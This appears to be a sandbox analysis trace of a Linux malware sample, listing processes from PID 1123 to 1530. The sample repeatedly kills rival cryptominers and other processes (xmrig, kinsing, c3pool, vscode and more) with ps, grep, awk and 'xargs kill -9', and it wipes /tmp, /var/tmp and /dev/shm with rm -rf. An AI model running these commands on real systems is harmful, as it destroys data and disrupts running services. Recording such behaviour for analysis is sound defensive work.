    PID:1123
- - /bin/ps
    ps aux
    3⤵
    - Reads CPU attributes
    PID:1124
- - /bin/grep
    grep -v grep
    3⤵
    PID:1125
- - /bin/grep
    grep khnug
    3⤵
    PID:1126
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1127
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    PID:1128
- - /bin/ps
    ps aux
    3⤵
    - Reads runtime system information
    PID:1129
- - /bin/grep
    grep -v grep
    3⤵
    PID:1130
- - /bin/grep
    grep Linux2
    3⤵
    PID:1131
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1132
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    PID:1133
- - /bin/ps
    ps aux
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:1134
- - /bin/grep
    grep -v grep
    3⤵
    PID:1135
- - /bin/grep
    grep kthreaddi
    3⤵
    PID:1136
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1137
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    - Attempts to change immutable files
    PID:1138
- - /bin/ps
    ps aux
    3⤵
    - Reads CPU attributes
    PID:1139
- - /bin/grep
    grep kkssl
    3⤵
    PID:1141
- - /bin/grep
    grep -v grep
    3⤵
    PID:1140
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1142
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    - Attempts to change immutable files
    PID:1143
- - /bin/ps
    ps aux
    3⤵
    - Reads CPU attributes
    PID:1144
- - /bin/grep
    grep -v grep
    3⤵
    PID:1145
- - /bin/grep
    grep cnrig
    3⤵
    PID:1146
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1147
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    - Attempts to change immutable files
    PID:1148
- - /bin/ps
    ps aux
    3⤵
    PID:1149
- - /bin/grep
    grep -v grep
    3⤵
    PID:1150
- - /bin/grep
    grep stratum
    3⤵
    PID:1151
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1152
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    PID:1153
- - /bin/ps
    ps aux
    3⤵
    - Reads runtime system information
    PID:1154
- - /bin/grep
    grep -v grep
    3⤵
    PID:1155
- - /bin/grep
    grep vscode
    3⤵
    PID:1156
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1157
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    PID:1158
- - /bin/ps
    ps aux
    3⤵
    - Reads CPU attributes
    PID:1159
- - /bin/grep
    grep -v grep
    3⤵
    PID:1160
- - /bin/grep
    grep "runsv puma"
    3⤵
    PID:1161
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1162
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    PID:1163
- - /bin/ps
    ps aux
    3⤵
    - Reads CPU attributes
    PID:1164
- - /bin/grep
    grep -v grep
    3⤵
    PID:1165
- - /bin/grep
    grep xmrig
    3⤵
    PID:1166
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1167
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    PID:1168
- - /bin/ps
    ps aux
    3⤵
    PID:1169
- - /bin/grep
    grep -v grep
    3⤵
    PID:1170
- - /bin/grep
    grep c3pool
    3⤵
    PID:1171
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1172
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    - Attempts to change immutable files
    PID:1173
- - /bin/ps
    ps aux
    3⤵
    PID:1174
- - /bin/grep
    grep -v grep
    3⤵
    PID:1175
- - /bin/grep
    grep kthreaddk
    3⤵
    PID:1176
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1177
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    - Attempts to change immutable files
    PID:1178
- - /bin/ps
    ps aux
    3⤵
    PID:1179
- - /bin/grep
    grep -v grep
    3⤵
    PID:1180
- - /bin/grep
    grep pool
    3⤵
    PID:1181
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1182
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    - Attempts to change immutable files
    PID:1183
- - /bin/ps
    ps aux
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:1184
- - /bin/grep
    grep -v grep
    3⤵
    PID:1185
- - /bin/grep
    grep dbused
    3⤵
    PID:1186
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1187
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    PID:1188
- - /bin/ps
    ps aux
    3⤵
    PID:1189
- - /bin/grep
    grep -v grep
    3⤵
    PID:1190
- - /bin/grep
    grep kdevtmpfsi
    3⤵
    PID:1191
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1192
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    PID:1193
- - /bin/ps
    ps aux
    3⤵
    PID:1194
- - /bin/grep
    grep -v grep
    3⤵
    PID:1195
- - /bin/grep
    grep kinsing
    3⤵
    PID:1196
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1197
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    PID:1198
- - /bin/ps
    ps aux
    3⤵
    - Reads runtime system information
    PID:1199
- - /bin/grep
    grep supportxmr
    3⤵
    PID:1201
- - /bin/grep
    grep -v grep
    3⤵
    PID:1200
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1202
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    PID:1203
- - /bin/ps
    ps aux
    3⤵
    PID:1204
- - /bin/grep
    grep -v grep
    3⤵
    PID:1205
- - /bin/grep
    grep xmr
    3⤵
    PID:1206
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1207
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    PID:1208
- - /bin/ps
    ps aux
    3⤵
    - Reads runtime system information
    PID:1209
- - /bin/grep
    grep -v grep
    3⤵
    PID:1210
- - /bin/grep
    grep kthreaddw
    3⤵
    PID:1211
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1212
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    - Attempts to change immutable files
    PID:1213
- - /bin/rm
    rm -rf "/tmp/*"
    3⤵
    PID:1214
- - /bin/rm
    rm -rf "/var/tmp/*"
    3⤵
    PID:1215
- - /bin/rm
    rm -rf "/dev/shm/*"
    3⤵
    PID:1216
- - /bin/sleep
    sleep 3
    3⤵
    PID:1217
- - /bin/ps
    ps aux
    3⤵
    - Reads CPU attributes
    PID:1218
- - /bin/grep
    grep -v grep
    3⤵
    PID:1219
- - /bin/grep
    grep miner
    3⤵
    PID:1220
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1221
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    - Attempts to change immutable files
    PID:1222
- - /bin/ps
    ps aux
    3⤵
    - Reads CPU attributes
    PID:1223
- - /bin/grep
    grep -v grep
    3⤵
    PID:1224
- - /bin/grep
    grep gitlabw
    3⤵
    PID:1225
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1226
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    PID:1227
- - /bin/ps
    ps aux
    3⤵
    PID:1228
- - /bin/grep
    grep -v grep
    3⤵
    PID:1229
- - /bin/grep
    grep xmp
    3⤵
    PID:1230
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1231
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    - Attempts to change immutable files
    PID:1232
- - /bin/ps
    ps aux
    3⤵
    - Reads runtime system information
    PID:1233
- - /bin/grep
    grep -v grep
    3⤵
    PID:1234
- - /bin/grep
    grep juiceSSH
    3⤵
    PID:1235
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1236
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    PID:1237
- - /bin/ps
    ps aux
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:1238
- - /bin/grep
    grep -v grep
    3⤵
    PID:1239
- - /bin/grep
    grep khnug
    3⤵
    PID:1240
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1241
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    - Attempts to change immutable files
    PID:1242
- - /bin/ps
    ps aux
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:1243
- - /bin/grep
    grep -v grep
    3⤵
    PID:1244
- - /bin/grep
    grep Linux2
    3⤵
    PID:1245
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1246
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    - Attempts to change immutable files
    PID:1247
- - /bin/ps
    ps aux
    3⤵
    - Reads CPU attributes
    PID:1248
- - /bin/grep
    grep -v grep
    3⤵
    PID:1249
- - /bin/grep
    grep kthreaddi
    3⤵
    PID:1250
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1251
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    PID:1252
- - /bin/ps
    ps aux
    3⤵
    - Reads CPU attributes
    PID:1253
- - /bin/grep
    grep -v grep
    3⤵
    PID:1254
- - /bin/grep
    grep kkssl
    3⤵
    PID:1255
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1256
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    - Attempts to change immutable files
    PID:1257
- - /bin/ps
    ps aux
    3⤵
    - Reads CPU attributes
    PID:1258
- - /bin/grep
    grep -v grep
    3⤵
    PID:1259
- - /bin/grep
    grep cnrig
    3⤵
    PID:1260
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1261
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    - Attempts to change immutable files
    PID:1262
- - /bin/ps
    ps aux
    3⤵
    PID:1263
- - /bin/grep
    grep stratum
    3⤵
    PID:1265
- - /bin/grep
    grep -v grep
    3⤵
    PID:1264
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1266
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    PID:1267
- - /bin/ps
    ps aux
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:1268
- - /bin/grep
    grep -v grep
    3⤵
    PID:1269
- - /bin/grep
    grep vscode
    3⤵
    PID:1270
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1271
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    - Attempts to change immutable files
    PID:1272
- - /bin/ps
    ps aux
    3⤵
    PID:1273
- - /bin/grep
    grep -v grep
    3⤵
    PID:1274
- - /bin/grep
    grep "runsv puma"
    3⤵
    PID:1275
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1276
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    - Attempts to change immutable files
    PID:1277
- - /bin/ps
    ps aux
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:1278
- - /bin/grep
    grep -v grep
    3⤵
    PID:1279
- - /bin/grep
    grep xmrig
    3⤵
    PID:1280
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1281
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    PID:1282
- - /bin/ps
    ps aux
    3⤵
    - Reads runtime system information
    PID:1283
- - /bin/grep
    grep -v grep
    3⤵
    PID:1284
- - /bin/grep
    grep c3pool
    3⤵
    PID:1285
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1286
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    PID:1287
- - /bin/ps
    ps aux
    3⤵
    - Reads CPU attributes
    PID:1288
- - /bin/grep
    grep -v grep
    3⤵
    PID:1289
- - /bin/grep
    grep kthreaddk
    3⤵
    PID:1290
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1291
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    - Attempts to change immutable files
    PID:1292
- - /bin/ps
    ps aux
    3⤵
    PID:1293
- - /bin/grep
    grep -v grep
    3⤵
    PID:1294
- - /bin/grep
    grep pool
    3⤵
    PID:1295
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1296
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    PID:1297
- - /bin/ps
    ps aux
    3⤵
    PID:1298
- - /bin/grep
    grep -v grep
    3⤵
    PID:1299
- - /bin/grep
    grep dbused
    3⤵
    PID:1300
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1301
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    - Attempts to change immutable files
    PID:1302
- - /bin/ps
    ps aux
    3⤵
    PID:1303
- - /bin/grep
    grep -v grep
    3⤵
    PID:1304
- - /bin/grep
    grep kdevtmpfsi
    3⤵
    PID:1305
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1306
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    - Attempts to change immutable files
    PID:1307
- - /bin/ps
    ps aux
    3⤵
    - Reads CPU attributes
    PID:1308
- - /bin/grep
    grep -v grep
    3⤵
    PID:1309
- - /bin/grep
    grep kinsing
    3⤵
    PID:1310
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1311
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    PID:1312
- - /bin/ps
    ps aux
    3⤵
    - Reads runtime system information
    PID:1313
- - /bin/grep
    grep -v grep
    3⤵
    PID:1314
- - /bin/grep
    grep supportxmr
    3⤵
    PID:1315
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1316
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    PID:1317
- - /bin/ps
    ps aux
    3⤵
    PID:1318
- - /bin/grep
    grep -v grep
    3⤵
    PID:1319
- - /bin/grep
    grep xmr
    3⤵
    PID:1320
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1321
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    - Attempts to change immutable files
    PID:1322
- - /bin/ps
    ps aux
    3⤵
    - Reads CPU attributes
    PID:1323
- - /bin/grep
    grep -v grep
    3⤵
    PID:1324
- - /bin/grep
    grep kthreaddw
    3⤵
    PID:1325
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1326
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    PID:1327
- - /bin/rm
    rm -rf "/tmp/*"
    3⤵
    PID:1328
- - /bin/rm
    rm -rf "/var/tmp/*"
    3⤵
    PID:1329
- - /bin/rm
    rm -rf "/dev/shm/*"
    3⤵
    PID:1330
- - /bin/sleep
    sleep 3
    3⤵
    PID:1331
- - /bin/ps
    ps aux
    3⤵
    PID:1332
- - /bin/grep
    grep -v grep
    3⤵
    PID:1333
- - /bin/grep
    grep miner
    3⤵
    PID:1334
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1335
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    PID:1336
- - /bin/ps
    ps aux
    3⤵
    - Reads runtime system information
    PID:1337
- - /bin/grep
    grep -v grep
    3⤵
    PID:1338
- - /bin/grep
    grep gitlabw
    3⤵
    PID:1339
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1340
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    - Attempts to change immutable files
    PID:1341
- - /bin/ps
    ps aux
    3⤵
    - Reads CPU attributes
    PID:1342
- - /bin/grep
    grep -v grep
    3⤵
    PID:1343
- - /bin/grep
    grep xmp
    3⤵
    PID:1344
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1345
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    PID:1346
- - /bin/ps
    ps aux
    3⤵
    PID:1347
- - /bin/grep
    grep -v grep
    3⤵
    PID:1348
- - /bin/grep
    grep juiceSSH
    3⤵
    PID:1349
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1350
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    - Attempts to change immutable files
    PID:1351
- - /bin/ps
    ps aux
    3⤵
    PID:1352
- - /bin/grep
    grep -v grep
    3⤵
    PID:1353
- - /bin/grep
    grep khnug
    3⤵
    PID:1354
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1355
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    - Attempts to change immutable files
    PID:1356
- - /bin/ps
    ps aux
    3⤵
    - Reads CPU attributes
    PID:1357
- - /bin/grep
    grep -v grep
    3⤵
    PID:1358
- - /bin/grep
    grep Linux2
    3⤵
    PID:1359
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1360
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    - Attempts to change immutable files
    PID:1361
- - /bin/grep
    grep kthreaddi
    3⤵
    PID:1364
- - /bin/ps
    ps aux
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:1362
- - /bin/grep
    grep -v grep
    3⤵
    PID:1363
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1365
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    - Attempts to change immutable files
    PID:1366
- - /bin/ps
    ps aux
    3⤵
    PID:1367
- - /bin/grep
    grep -v grep
    3⤵
    PID:1368
- - /bin/grep
    grep kkssl
    3⤵
    PID:1369
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1370
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    PID:1371
- - /bin/ps
    ps aux
    3⤵
    - Reads CPU attributes
    PID:1372
- - /bin/grep
    grep -v grep
    3⤵
    PID:1373
- - /bin/grep
    grep cnrig
    3⤵
    PID:1374
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1375
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    - Attempts to change immutable files
    PID:1376
- - /bin/grep
    grep -v grep
    3⤵
    PID:1378
- - /bin/ps
    ps aux
    3⤵
    PID:1377
- - /bin/grep
    grep stratum
    3⤵
    PID:1379
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1380
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    PID:1381
- - /bin/ps
    ps aux
    3⤵
    PID:1382
- - /bin/grep
    grep -v grep
    3⤵
    PID:1383
- - /bin/grep
    grep vscode
    3⤵
    PID:1384
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1385
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    - Attempts to change immutable files
    PID:1386
- - /bin/ps
    ps aux
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:1387
- - /bin/grep
    grep -v grep
    3⤵
    PID:1388
- - /bin/grep
    grep "runsv puma"
    3⤵
    PID:1389
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1390
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    PID:1391
- - /bin/ps
    ps aux
    3⤵
    PID:1392
- - /bin/grep
    grep -v grep
    3⤵
    PID:1393
- - /bin/grep
    grep xmrig
    3⤵
    PID:1394
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1395
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    - Attempts to change immutable files
    PID:1396
- - /bin/ps
    ps aux
    3⤵
    - Reads CPU attributes
    PID:1397
- - /bin/grep
    grep -v grep
    3⤵
    PID:1398
- - /bin/grep
    grep c3pool
    3⤵
    PID:1399
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1400
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    - Attempts to change immutable files
    PID:1401
- - /bin/ps
    ps aux
    3⤵
    PID:1402
- - /bin/grep
    grep -v grep
    3⤵
    PID:1403
- - /bin/grep
    grep kthreaddk
    3⤵
    PID:1404
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1405
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    PID:1406
- - /bin/ps
    ps aux
    3⤵
    PID:1407
- - /bin/grep
    grep -v grep
    3⤵
    PID:1408
- - /bin/grep
    grep pool
    3⤵
    PID:1409
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1410
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    - Attempts to change immutable files
    PID:1411
- - /bin/ps
    ps aux
    3⤵
    PID:1412
- - /bin/grep
    grep -v grep
    3⤵
    PID:1413
- - /bin/grep
    grep dbused
    3⤵
    PID:1414
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1415
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    PID:1416
- - /bin/ps
    ps aux
    3⤵
    - Reads runtime system information
    PID:1417
- - /bin/grep
    grep -v grep
    3⤵
    PID:1418
- - /bin/grep
    grep kdevtmpfsi
    3⤵
    PID:1419
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1420
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    PID:1421
- - /bin/ps
    ps aux
    3⤵
    PID:1422
- - /bin/grep
    grep -v grep
    3⤵
    PID:1423
- - /bin/grep
    grep kinsing
    3⤵
    PID:1424
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1425
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    - Attempts to change immutable files
    PID:1426
- - /bin/ps
    ps aux
    3⤵
    - Reads CPU attributes
    PID:1427
- - /bin/grep
    grep -v grep
    3⤵
    PID:1428
- - /bin/grep
    grep supportxmr
    3⤵
    PID:1429
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1430
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    - Attempts to change immutable files
    PID:1431
- - /bin/ps
    ps aux
    3⤵
    - Reads CPU attributes
    PID:1432
- - /bin/grep
    grep -v grep
    3⤵
    PID:1433
- - /bin/grep
    grep xmr
    3⤵
    PID:1434
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1435
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    - Attempts to change immutable files
    PID:1436
- - /bin/ps
    ps aux
    3⤵
    - Reads runtime system information
    PID:1437
- - /bin/grep
    grep -v grep
    3⤵
    PID:1438
- - /bin/grep
    grep kthreaddw
    3⤵
    PID:1439
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1440
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    PID:1441
- - /bin/rm
    rm -rf "/tmp/*"
    3⤵
    PID:1442
- - /bin/rm
    rm -rf "/var/tmp/*"
    3⤵
    PID:1443
- - /bin/rm
    rm -rf "/dev/shm/*"
    3⤵
    PID:1444
- - /bin/sleep
    sleep 3
    3⤵
    PID:1445
- - /bin/ps
    ps aux
    3⤵
    - Reads CPU attributes
    PID:1446
- - /bin/grep
    grep -v grep
    3⤵
    PID:1447
- - /bin/grep
    grep miner
    3⤵
    PID:1448
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1449
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    PID:1450
- - /bin/ps
    ps aux
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:1451
- - /bin/grep
    grep -v grep
    3⤵
    PID:1452
- - /bin/grep
    grep gitlabw
    3⤵
    PID:1453
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1454
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    PID:1455
- - /bin/ps
    ps aux
    3⤵
    - Reads runtime system information
    PID:1456
- - /bin/grep
    grep -v grep
    3⤵
    PID:1457
- - /bin/grep
    grep xmp
    3⤵
    PID:1458
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1459
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    PID:1460
- - /bin/ps
    ps aux
    3⤵
    PID:1461
- - /bin/grep
    grep -v grep
    3⤵
    PID:1462
- - /bin/grep
    grep juiceSSH
    3⤵
    PID:1463
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1464
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    PID:1465
- - /bin/ps
    ps aux
    3⤵
    PID:1466
- - /bin/grep
    grep -v grep
    3⤵
    PID:1467
- - /bin/grep
    grep khnug
    3⤵
    PID:1468
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1469
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    - Attempts to change immutable files
    PID:1470
- - /bin/ps
    ps aux
    3⤵
    - Reads runtime system information
    PID:1471
- - /bin/grep
    grep -v grep
    3⤵
    PID:1472
- - /bin/grep
    grep Linux2
    3⤵
    PID:1473
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1474
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    PID:1475
- - /bin/ps
    ps aux
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:1476
- - /bin/grep
    grep -v grep
    3⤵
    PID:1477
- - /bin/grep
    grep kthreaddi
    3⤵
    PID:1478
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1479
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    PID:1480
- - /bin/ps
    ps aux
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:1481
- - /bin/grep
    grep -v grep
    3⤵
    PID:1482
- - /bin/grep
    grep kkssl
    3⤵
    PID:1483
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1484
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    - Attempts to change immutable files
    PID:1485
- - /bin/ps
    ps aux
    3⤵
    PID:1486
- - /bin/grep
    grep -v grep
    3⤵
    PID:1487
- - /bin/grep
    grep cnrig
    3⤵
    PID:1488
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1489
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    PID:1490
- - /bin/ps
    ps aux
    3⤵
    - Reads runtime system information
    PID:1491
- - /bin/grep
    grep -v grep
    3⤵
    PID:1492
- - /bin/grep
    grep stratum
    3⤵
    PID:1493
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1494
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    PID:1495
- - /bin/ps
    ps aux
    3⤵
    - Reads runtime system information
    PID:1496
- - /bin/grep
    grep -v grep
    3⤵
    PID:1497
- - /bin/grep
    grep vscode
    3⤵
    PID:1498
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1499
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    - Attempts to change immutable files
    PID:1500
- - /bin/ps
    ps aux
    3⤵
    PID:1501
- - /bin/grep
    grep -v grep
    3⤵
    PID:1502
- - /bin/grep
    grep "runsv puma"
    3⤵
    PID:1503
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1504
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    PID:1505
- - /bin/ps
    ps aux
    3⤵
    - Reads runtime system information
    PID:1506
- - /bin/grep
    grep -v grep
    3⤵
    PID:1507
- - /bin/grep
    grep xmrig
    3⤵
    PID:1508
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1509
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    PID:1510
- - /bin/ps
    ps aux
    3⤵
    - Reads CPU attributes
    PID:1511
- - /bin/grep
    grep -v grep
    3⤵
    PID:1512
- - /bin/grep
    grep c3pool
    3⤵
    PID:1513
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1514
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    PID:1515
- - /bin/ps
    ps aux
    3⤵
    - Reads runtime system information
    PID:1516
- - /bin/grep
    grep -v grep
    3⤵
    PID:1517
- - /bin/grep
    grep kthreaddk
    3⤵
    PID:1518
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1519
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    PID:1520
- - /bin/ps
    ps aux
    3⤵
    - Reads runtime system information
    PID:1521
- - /bin/grep
    grep -v grep
    3⤵
    PID:1522
- - /bin/grep
    grep pool
    3⤵
    PID:1523
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1524
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    - Attempts to change immutable files
    PID:1525
- - /bin/ps
    ps aux
    3⤵
    - Reads CPU attributes
    PID:1526
- - /bin/grep
    grep -v grep
    3⤵
    PID:1527
- - /bin/grep
    grep dbused
    3⤵
    PID:1528
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1529
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    PID:1530
- - /bin/ps
